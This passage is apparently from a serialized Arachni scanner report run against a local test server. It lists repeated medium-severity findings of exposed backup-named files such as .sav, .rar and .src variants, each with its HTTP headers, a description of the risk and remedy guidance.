    response: some_filename.cs
    severity: Medium
    tags: 
    - path
    - backup
    - file
    - discovery
    url: http://localhost:9338/some_filename.cs
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: |-
    The server response indicates that a file matching
        the name of a common naming scheme for file backups can be publicly accessible.
        A developer has probably forgotten to remove this file after testing.
        This can lead to source code disclosure and privileged information leaks.
  elem: path
  internal_modname: BackupFiles
  method: ""
  mod_name: BackupFiles
  name: A backup file exists on the server.
  references: 
    WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
  remedy_guidance: |-
    Do not keep alternative versions of files underneath the virtual web server root.
                        When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                        and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
  severity: Medium
  tags: 
  - path
  - backup
  - file
  - discovery
  url: http://localhost:9338/some_filename.pas
  variations: 
  - !ruby/object:Arachni::Issue 
    description: |-
      The server response indicates that a file matching
          the name of a common naming scheme for file backups can be publicly accessible.
          A developer has probably forgotten to remove this file after testing.
          This can lead to source code disclosure and privileged information leaks.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "17"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: some_filename.pas
    injected: some_filename.pas
    internal_modname: BackupFiles
    method: ""
    mod_name: BackupFiles
    name: A backup file exists on the server.
    opts: 
      :regexp: ""
    references: 
      WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
    remedy_guidance: |-
      Do not keep alternative versions of files underneath the virtual web server root.
                          When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                          and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
    response: some_filename.pas
    severity: Medium
    tags: 
    - path
    - backup
    - file
    - discovery
    url: http://localhost:9338/some_filename.pas
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: |-
    The server response indicates that a file matching
        the name of a common naming scheme for file backups can be publicly accessible.
        A developer has probably forgotten to remove this file after testing.
        This can lead to source code disclosure and privileged information leaks.
  elem: path
  internal_modname: BackupFiles
  method: ""
  mod_name: BackupFiles
  name: A backup file exists on the server.
  references: 
    WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
  remedy_guidance: |-
    Do not keep alternative versions of files underneath the virtual web server root.
                        When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                        and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
  severity: Medium
  tags: 
  - path
  - backup
  - file
  - discovery
  url: http://localhost:9338/some_filename.php.pas
  variations: 
  - !ruby/object:Arachni::Issue 
    description: |-
      The server response indicates that a file matching
          the name of a common naming scheme for file backups can be publicly accessible.
          A developer has probably forgotten to remove this file after testing.
          This can lead to source code disclosure and privileged information leaks.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "21"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: some_filename.php.pas
    injected: some_filename.php.pas
    internal_modname: BackupFiles
    method: ""
    mod_name: BackupFiles
    name: A backup file exists on the server.
    opts: 
      :regexp: ""
    references: 
      WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
    remedy_guidance: |-
      Do not keep alternative versions of files underneath the virtual web server root.
                          When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                          and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
    response: some_filename.php.pas
    severity: Medium
    tags: 
    - path
    - backup
    - file
    - discovery
    url: http://localhost:9338/some_filename.php.pas
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: |-
    The server response indicates that a file matching
        the name of a common naming scheme for file backups can be publicly accessible.
        A developer has probably forgotten to remove this file after testing.
        This can lead to source code disclosure and privileged information leaks.
  elem: path
  internal_modname: BackupFiles
  method: ""
  mod_name: BackupFiles
  name: A backup file exists on the server.
  references: 
    WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
  remedy_guidance: |-
    Do not keep alternative versions of files underneath the virtual web server root.
                        When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                        and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
  severity: Medium
  tags: 
  - path
  - backup
  - file
  - discovery
  url: http://localhost:9338/some_filename.php.vb
  variations: 
  - !ruby/object:Arachni::Issue 
    description: |-
      The server response indicates that a file matching
          the name of a common naming scheme for file backups can be publicly accessible.
          A developer has probably forgotten to remove this file after testing.
          This can lead to source code disclosure and privileged information leaks.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "20"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: some_filename.php.vb
    injected: some_filename.php.vb
    internal_modname: BackupFiles
    method: ""
    mod_name: BackupFiles
    name: A backup file exists on the server.
    opts: 
      :regexp: ""
    references: 
      WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
    remedy_guidance: |-
      Do not keep alternative versions of files underneath the virtual web server root.
                          When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                          and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
    response: some_filename.php.vb
    severity: Medium
    tags: 
    - path
    - backup
    - file
    - discovery
    url: http://localhost:9338/some_filename.php.vb
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: |-
    The server response indicates that a file matching
        the name of a common naming scheme for file backups can be publicly accessible.
        A developer has probably forgotten to remove this file after testing.
        This can lead to source code disclosure and privileged information leaks.
  elem: path
  internal_modname: BackupFiles
  method: ""
  mod_name: BackupFiles
  name: A backup file exists on the server.
  references: 
    WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
  remedy_guidance: |-
    Do not keep alternative versions of files underneath the virtual web server root.
                        When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                        and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
  severity: Medium
  tags: 
  - path
  - backup
  - file
  - discovery
  url: http://localhost:9338/some_filename.vb
  variations: 
  - !ruby/object:Arachni::Issue 
    description: |-
      The server response indicates that a file matching
          the name of a common naming scheme for file backups can be publicly accessible.
          A developer has probably forgotten to remove this file after testing.
          This can lead to source code disclosure and privileged information leaks.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "16"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: some_filename.vb
    injected: some_filename.vb
    internal_modname: BackupFiles
    method: ""
    mod_name: BackupFiles
    name: A backup file exists on the server.
    opts: 
      :regexp: ""
    references: 
      WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
    remedy_guidance: |-
      Do not keep alternative versions of files underneath the virtual web server root.
                          When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                          and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
    response: some_filename.vb
    severity: Medium
    tags: 
    - path
    - backup
    - file
    - discovery
    url: http://localhost:9338/some_filename.vb
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: |-
    The server response indicates that a file matching
        the name of a common naming scheme for file backups can be publicly accessible.
        A developer has probably forgotten to remove this file after testing.
        This can lead to source code disclosure and privileged information leaks.
  elem: path
  internal_modname: BackupFiles
  method: ""
  mod_name: BackupFiles
  name: A backup file exists on the server.
  references: 
    WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
  remedy_guidance: |-
    Do not keep alternative versions of files underneath the virtual web server root.
                        When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                        and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
  severity: Medium
  tags: 
  - path
  - backup
  - file
  - discovery
  url: http://localhost:9338/some_filename.php.java
  variations: 
  - !ruby/object:Arachni::Issue 
    description: |-
      The server response indicates that a file matching
          the name of a common naming scheme for file backups can be publicly accessible.
          A developer has probably forgotten to remove this file after testing.
          This can lead to source code disclosure and privileged information leaks.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "22"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: some_filename.php.java
    injected: some_filename.php.java
    internal_modname: BackupFiles
    method: ""
    mod_name: BackupFiles
    name: A backup file exists on the server.
    opts: 
      :regexp: ""
    references: 
      WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
    remedy_guidance: |-
      Do not keep alternative versions of files underneath the virtual web server root.
                          When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                          and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
    response: some_filename.php.java
    severity: Medium
    tags: 
    - path
    - backup
    - file
    - discovery
    url: http://localhost:9338/some_filename.php.java
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: |-
    The server response indicates that a file matching
        the name of a common naming scheme for file backups can be publicly accessible.
        A developer has probably forgotten to remove this file after testing.
        This can lead to source code disclosure and privileged information leaks.
  elem: path
  internal_modname: BackupFiles
  method: ""
  mod_name: BackupFiles
  name: A backup file exists on the server.
  references: 
    WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
  remedy_guidance: |-
    Do not keep alternative versions of files underneath the virtual web server root.
                        When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                        and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
  severity: Medium
  tags: 
  - path
  - backup
  - file
  - discovery
  url: http://localhost:9338/some_filename.java
  variations: 
  - !ruby/object:Arachni::Issue 
    description: |-
      The server response indicates that a file matching
          the name of a common naming scheme for file backups can be publicly accessible.
          A developer has probably forgotten to remove this file after testing.
          This can lead to source code disclosure and privileged information leaks.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "18"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: some_filename.java
    injected: some_filename.java
    internal_modname: BackupFiles
    method: ""
    mod_name: BackupFiles
    name: A backup file exists on the server.
    opts: 
      :regexp: ""
    references: 
      WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
    remedy_guidance: |-
      Do not keep alternative versions of files underneath the virtual web server root.
                          When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                          and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
    response: some_filename.java
    severity: Medium
    tags: 
    - path
    - backup
    - file
    - discovery
    url: http://localhost:9338/some_filename.java
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: |-
    The server response indicates that a file matching
        the name of a common naming scheme for file backups can be publicly accessible.
        A developer has probably forgotten to remove this file after testing.
        This can lead to source code disclosure and privileged information leaks.
  elem: path
  internal_modname: BackupFiles
  method: ""
  mod_name: BackupFiles
  name: A backup file exists on the server.
  references: 
    WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
  remedy_guidance: |-
    Do not keep alternative versions of files underneath the virtual web server root.
                        When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                        and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
  severity: Medium
  tags: 
  - path
  - backup
  - file
  - discovery
  url: http://localhost:9338/some_filename.php.class
  variations: 
  - !ruby/object:Arachni::Issue 
    description: |-
      The server response indicates that a file matching
          the name of a common naming scheme for file backups can be publicly accessible.
          A developer has probably forgotten to remove this file after testing.
          This can lead to source code disclosure and privileged information leaks.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "23"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: some_filename.php.class
    injected: some_filename.php.class
    internal_modname: BackupFiles
    method: ""
    mod_name: BackupFiles
    name: A backup file exists on the server.
    opts: 
      :regexp: ""
    references: 
      WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
    remedy_guidance: |-
      Do not keep alternative versions of files underneath the virtual web server root.
                          When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                          and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
    response: some_filename.php.class
    severity: Medium
    tags: 
    - path
    - backup
    - file
    - discovery
    url: http://localhost:9338/some_filename.php.class
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: |-
    The server response indicates that a file matching
        the name of a common naming scheme for file backups can be publicly accessible.
        A developer has probably forgotten to remove this file after testing.
        This can lead to source code disclosure and privileged information leaks.
  elem: path
  internal_modname: BackupFiles
  method: ""
  mod_name: BackupFiles
  name: A backup file exists on the server.
  references: 
    WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
  remedy_guidance: |-
    Do not keep alternative versions of files underneath the virtual web server root.
                        When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                        and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
  severity: Medium
  tags: 
  - path
  - backup
  - file
  - discovery
  url: http://localhost:9338/some_filename.class
  variations: 
  - !ruby/object:Arachni::Issue 
    description: |-
      The server response indicates that a file matching
          the name of a common naming scheme for file backups can be publicly accessible.
          A developer has probably forgotten to remove this file after testing.
          This can lead to source code disclosure and privileged information leaks.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "19"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: some_filename.class
    injected: some_filename.class
    internal_modname: BackupFiles
    method: ""
    mod_name: BackupFiles
    name: A backup file exists on the server.
    opts: 
      :regexp: ""
    references: 
      WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
    remedy_guidance: |-
      Do not keep alternative versions of files underneath the virtual web server root.
                          When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                          and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
    response: some_filename.class
    severity: Medium
    tags: 
    - path
    - backup
    - file
    - discovery
    url: http://localhost:9338/some_filename.class
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: |-
    The server response indicates that a file matching
        the name of a common naming scheme for file backups can be publicly accessible.
        A developer has probably forgotten to remove this file after testing.
        This can lead to source code disclosure and privileged information leaks.
  elem: path
  internal_modname: BackupFiles
  method: ""
  mod_name: BackupFiles
  name: A backup file exists on the server.
  references: 
    WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
  remedy_guidance: |-
    Do not keep alternative versions of files underneath the virtual web server root.
                        When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                        and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
  severity: Medium
  tags: 
  - path
  - backup
  - file
  - discovery
  url: http://localhost:9338/some_filename.php.sav
  variations: 
  - !ruby/object:Arachni::Issue 
    description: |-
      The server response indicates that a file matching
          the name of a common naming scheme for file backups can be publicly accessible.
          A developer has probably forgotten to remove this file after testing.
          This can lead to source code disclosure and privileged information leaks.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "21"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: some_filename.php.sav
    injected: some_filename.php.sav
    internal_modname: BackupFiles
    method: ""
    mod_name: BackupFiles
    name: A backup file exists on the server.
    opts: 
      :regexp: ""
    references: 
      WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
    remedy_guidance: |-
      Do not keep alternative versions of files underneath the virtual web server root.
                          When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                          and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
    response: some_filename.php.sav
    severity: Medium
    tags: 
    - path
    - backup
    - file
    - discovery
    url: http://localhost:9338/some_filename.php.sav
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: |-
    The server response indicates that a file matching
        the name of a common naming scheme for file backups can be publicly accessible.
        A developer has probably forgotten to remove this file after testing.
        This can lead to source code disclosure and privileged information leaks.
  elem: path
  internal_modname: BackupFiles
  method: ""
  mod_name: BackupFiles
  name: A backup file exists on the server.
  references: 
    WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
  remedy_guidance: |-
    Do not keep alternative versions of files underneath the virtual web server root.
                        When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                        and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
  severity: Medium
  tags: 
  - path
  - backup
  - file
  - discovery
  url: http://localhost:9338/some_filename.php.saved
  variations: 
  - !ruby/object:Arachni::Issue 
    description: |-
      The server response indicates that a file matching
          the name of a common naming scheme for file backups can be publicly accessible.
          A developer has probably forgotten to remove this file after testing.
          This can lead to source code disclosure and privileged information leaks.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "23"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: some_filename.php.saved
    injected: some_filename.php.saved
    internal_modname: BackupFiles
    method: ""
    mod_name: BackupFiles
    name: A backup file exists on the server.
    opts: 
      :regexp: ""
    references: 
      WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
    remedy_guidance: |-
      Do not keep alternative versions of files underneath the virtual web server root.
                          When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                          and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
    response: some_filename.php.saved
    severity: Medium
    tags: 
    - path
    - backup
    - file
    - discovery
    url: http://localhost:9338/some_filename.php.saved
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: |-
    The server response indicates that a file matching
        the name of a common naming scheme for file backups can be publicly accessible.
        A developer has probably forgotten to remove this file after testing.
        This can lead to source code disclosure and privileged information leaks.
  elem: path
  internal_modname: BackupFiles
  method: ""
  mod_name: BackupFiles
  name: A backup file exists on the server.
  references: 
    WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
  remedy_guidance: |-
    Do not keep alternative versions of files underneath the virtual web server root.
                        When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                        and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
  severity: Medium
  tags: 
  - path
  - backup
  - file
  - discovery
  url: http://localhost:9338/some_filename.sav
  variations: 
  - !ruby/object:Arachni::Issue 
    description: |-
      The server response indicates that a file matching
          the name of a common naming scheme for file backups can be publicly accessible.
          A developer has probably forgotten to remove this file after testing.
          This can lead to source code disclosure and privileged information leaks.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "17"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: some_filename.sav
    injected: some_filename.sav
    internal_modname: BackupFiles
    method: ""
    mod_name: BackupFiles
    name: A backup file exists on the server.
    opts: 
      :regexp: ""
    references: 
      WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
    remedy_guidance: |-
      Do not keep alternative versions of files underneath the virtual web server root.
                          When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                          and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
    response: some_filename.sav
    severity: Medium
    tags: 
    - path
    - backup
    - file
    - discovery
    url: http://localhost:9338/some_filename.sav
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: |-
    The server response indicates that a file matching
        the name of a common naming scheme for file backups can be publicly accessible.
        A developer has probably forgotten to remove this file after testing.
        This can lead to source code disclosure and privileged information leaks.
  elem: path
  internal_modname: BackupFiles
  method: ""
  mod_name: BackupFiles
  name: A backup file exists on the server.
  references: 
    WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
  remedy_guidance: |-
    Do not keep alternative versions of files underneath the virtual web server root.
                        When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                        and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
  severity: Medium
  tags: 
  - path
  - backup
  - file
  - discovery
  url: http://localhost:9338/some_filename.saved
  variations: 
  - !ruby/object:Arachni::Issue 
    description: |-
      The server response indicates that a file matching
          the name of a common naming scheme for file backups can be publicly accessible.
          A developer has probably forgotten to remove this file after testing.
          This can lead to source code disclosure and privileged information leaks.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "19"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: some_filename.saved
    injected: some_filename.saved
    internal_modname: BackupFiles
    method: ""
    mod_name: BackupFiles
    name: A backup file exists on the server.
    opts: 
      :regexp: ""
    references: 
      WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
    remedy_guidance: |-
      Do not keep alternative versions of files underneath the virtual web server root.
                          When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                          and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
    response: some_filename.saved
    severity: Medium
    tags: 
    - path
    - backup
    - file
    - discovery
    url: http://localhost:9338/some_filename.saved
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: |-
    The server response indicates that a file matching
        the name of a common naming scheme for file backups can be publicly accessible.
        A developer has probably forgotten to remove this file after testing.
        This can lead to source code disclosure and privileged information leaks.
  elem: path
  internal_modname: BackupFiles
  method: ""
  mod_name: BackupFiles
  name: A backup file exists on the server.
  references: 
    WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
  remedy_guidance: |-
    Do not keep alternative versions of files underneath the virtual web server root.
                        When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                        and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
  severity: Medium
  tags: 
  - path
  - backup
  - file
  - discovery
  url: http://localhost:9338/some_filename.php.rar
  variations: 
  - !ruby/object:Arachni::Issue 
    description: |-
      The server response indicates that a file matching
          the name of a common naming scheme for file backups can be publicly accessible.
          A developer has probably forgotten to remove this file after testing.
          This can lead to source code disclosure and privileged information leaks.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "21"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: some_filename.php.rar
    injected: some_filename.php.rar
    internal_modname: BackupFiles
    method: ""
    mod_name: BackupFiles
    name: A backup file exists on the server.
    opts: 
      :regexp: ""
    references: 
      WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
    remedy_guidance: |-
      Do not keep alternative versions of files underneath the virtual web server root.
                          When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                          and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
    response: some_filename.php.rar
    severity: Medium
    tags: 
    - path
    - backup
    - file
    - discovery
    url: http://localhost:9338/some_filename.php.rar
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: |-
    The server response indicates that a file matching
        the name of a common naming scheme for file backups can be publicly accessible.
        A developer has probably forgotten to remove this file after testing.
        This can lead to source code disclosure and privileged information leaks.
  elem: path
  internal_modname: BackupFiles
  method: ""
  mod_name: BackupFiles
  name: A backup file exists on the server.
  references: 
    WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
  remedy_guidance: |-
    Do not keep alternative versions of files underneath the virtual web server root.
                        When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                        and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
  severity: Medium
  tags: 
  - path
  - backup
  - file
  - discovery
  url: http://localhost:9338/some_filename.rar
  variations: 
  - !ruby/object:Arachni::Issue 
    description: |-
      The server response indicates that a file matching
          the name of a common naming scheme for file backups can be publicly accessible.
          A developer has probably forgotten to remove this file after testing.
          This can lead to source code disclosure and privileged information leaks.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "17"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: some_filename.rar
    injected: some_filename.rar
    internal_modname: BackupFiles
    method: ""
    mod_name: BackupFiles
    name: A backup file exists on the server.
    opts: 
      :regexp: ""
    references: 
      WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
    remedy_guidance: |-
      Do not keep alternative versions of files underneath the virtual web server root.
                          When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                          and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
    response: some_filename.rar
    severity: Medium
    tags: 
    - path
    - backup
    - file
    - discovery
    url: http://localhost:9338/some_filename.rar
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: |-
    The server response indicates that a file matching
        the name of a common naming scheme for file backups can be publicly accessible.
        A developer has probably forgotten to remove this file after testing.
        This can lead to source code disclosure and privileged information leaks.
  elem: path
  internal_modname: BackupFiles
  method: ""
  mod_name: BackupFiles
  name: A backup file exists on the server.
  references: 
    WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
  remedy_guidance: |-
    Do not keep alternative versions of files underneath the virtual web server root.
                        When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                        and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
  severity: Medium
  tags: 
  - path
  - backup
  - file
  - discovery
  url: http://localhost:9338/some_filename.php.src
  variations: 
  - !ruby/object:Arachni::Issue 
    description: |-
      The server response indicates that a file matching
          the name of a common naming scheme for file backups can be publicly accessible.
          A developer has probably forgotten to remove this file after testing.
          This can lead to source code disclosure and privileged information leaks.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "21"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: some_filename.php.src
    injected: some_filename.php.src
    internal_modname: BackupFiles
    method: ""
    mod_name: BackupFiles
    name: A backup file exists on the server.
    opts: 
      :regexp: ""
    references: 
      WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
    remedy_guidance: |-
      Do not keep alternative versions of files underneath the virtual web server root.
                          When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                          and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
    response: some_filename.php.src
    severity: Medium
    tags: 
    - path
    - backup
    - file
    - discovery
    url: http://localhost:9338/some_filename.php.src
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: |-
    The server response indicates that a file matching
        the name of a common naming scheme for file backups can be publicly accessible.
        A developer has probably forgotten to remove this file after testing.
        This can lead to source code disclosure and privileged information leaks.
  elem: path
  internal_modname: BackupFiles
  method: ""
  mod_name: BackupFiles
  name: A backup file exists on the server.
  references: 
    WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
  remedy_guidance: |-
    Do not keep alternative versions of files underneath the virtual web server root.
                        When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                        and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
  severity: Medium
  tags: 
  - path
  - backup
  - file
